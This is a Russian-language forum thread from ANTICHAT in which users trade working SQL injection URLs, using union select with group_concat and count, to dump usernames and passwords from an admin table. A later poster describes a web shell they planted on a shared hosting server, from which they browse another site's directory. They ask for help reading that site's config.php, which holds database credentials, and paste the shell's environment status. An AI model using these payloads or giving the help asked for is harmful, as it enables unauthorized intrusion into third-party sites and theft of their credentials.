ANTICHAT — форум по информационной безопасности, OSINT и технологиям

j0ker13, что-то мне кажется, что так оно и есть.

2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--

Отображается так же одна запись как и при limit 0,1

Получается там все одна запись?

да, 100%, иначе group_concat вытащил бы несколько записей по любому

и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.

Похоже на то...

Я что-то пропустил. или count() отменили? )

Разве так не проще?
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--

jokester, Действительно, так проще, и запись действительно одна.

jokester
Если не ошибаюсь, то count() и null ячейки будет считать,и пустые.
Например покажет, что записей 25, а будет всего 3, остальные пустые.Но он их посчитает.

Для начала всех с наступающим новым годом ))
Теперь вопрос.
Поимел шелл на серваке, не на том сайте, который мне нужен,но надеясь получить к нему доступ.
Safe_mode оказался: OFF
Нахожусь в директории где шелл (путь)
/home/s/site/site.com/public/www/admin/
При попытке перейти в директорию /home/ редиректит назад на /home/s/site/site.com/public/www/admin/
Шелл
(r57shell v.1.42)
Если выполняю команду ls -la /home/ переходит удачно и всё показывает. Так добрался до нужного мне сайта
ls -la /home/t/target/target.com/public/www/
Там нашёл файл config.php, с данными для коннекта к бд.
Как мне его прочитать?
Скачать не получилось
Ввожу в :: Download files from server :: путь к файлу
/home/t/target/target.com/public/www/config.php
редиректит назад в директорию с шеллом.
Если выполняю команду
more /home/t/target/target.com/public/www/config.php
или
more config.php
выдаёт пустой экран в шелле.
Что делать? Я почти неделю убил на поиск уязвимостей, и тут такой облом :'(

Вот стат с шелла

PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: ON mSQL: OFF SQLite: ON
Safe_mode: OFF Open_basedir: VIRTUAL_DOCUMENT_ROOT:/usr/local/lib/php:/usr/local/lib/ph:/home/sys/phplib/:/usr/local/bin/ Safe_exec_dir: /usr/local/php/bin Safe_gid: OFF Safe_include_dir: NONE Sql.safe_mode: OFF
Disable functions : NONE
Free space : 0 B Total space: 0 B
Useful: mod_include(SSI)
Dangerous: -
Downloaders: fopen

И ещё вопрос. Все сайты на одном серваке, но на многих PHP version: 5.2.6 а на некотрых четвёртая. (в том числе и на том, на который я залил шелл) Как так?
Помогите прочитать файл плз (или скачать его).Очень прошу.